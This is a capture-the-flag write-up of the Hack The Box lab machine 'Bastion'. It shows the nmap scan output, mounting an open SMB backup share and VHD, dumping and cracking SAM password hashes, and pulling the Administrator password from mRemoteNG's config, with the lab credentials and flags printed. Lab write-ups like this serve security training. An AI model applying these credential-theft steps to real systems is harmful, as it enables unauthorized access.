Difficulty Rating:

Machine: Bastion
OS: Windows
IP: 10.10.10.134


The machine had an open SMB share which contained Windows backup in VHD format. We were able to extract the SAM database and crack NTLM password for the user. Later, the Admin user was compromised by exploiting a known vulnerability in one of the installed software with a vulnerable version.


  • Nmap
$ nmap -sV -sS -T4 -p- -vv -oN bastion-full-nmap 10.10.10.134

# Nmap 7.70 scan initiated Wed Aug 21 14:48:34 2019 as: nmap -sV -sS -T4 -p- -vv -oN bastion-full-nmap 10.10.10.134
Increasing send delay for 10.10.10.134 from 0 to 5 due to 595 out of 1487 dropped probes since last increase.
Warning: 10.10.10.134 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.134
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2019-08-21 14:48:34 IST for 842s
Not shown: 65511 closed ports
Reason: 65511 resets
PORT      STATE    SERVICE      REASON          VERSION
22/tcp    open     ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open     netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1068/tcp  filtered instl_bootc  no-response
5985/tcp  open     http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9500/tcp  filtered ismserver    no-response
11605/tcp filtered unknown      no-response
12282/tcp filtered unknown      no-response
33808/tcp filtered unknown      no-response
34350/tcp filtered unknown      no-response
40119/tcp filtered unknown      no-response
47001/tcp open     http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
54364/tcp filtered unknown      no-response
58159/tcp filtered unknown      no-response
58615/tcp filtered unknown      no-response
60134/tcp filtered unknown      no-response
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 21 15:02:37 2019 -- 1 IP address (1 host up) scanned in 842.81 seconds

  • Check for smb shares

$ sudo mount -t cifs -o username='WORKGROUP\foobar' -o rw //10.10.10.134/backups /mnt/shares
  • Mount the bigger vhd file
$ sudo guestmount --add "/mnt/shares/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd1 -v
  • Let’s check SAM database

  • Dump SAM database using pwdump tool

  • Hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
  • Cracking the hash of user L4mpje gives password bureaulampje

  • SSH using the following creds:

username: L4mpje
password: bureaulampje

  • Get user.txt

9bfe57d5c3309db3a151772f9d86c6cd
User owned!!
  • Check installed softwares
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize

  • Let’s check for vulnerabilities in mRemoteNG software

  • Extract base64 password for Administrator from confCons.xml

  • Use this password to SSH with user Administrator
username: Administrator
password: thXLHM96BeKL0ER2

  • Get root.txt

958850b91811676ed6620a9c430e65c8
System owned!!

Share the fun!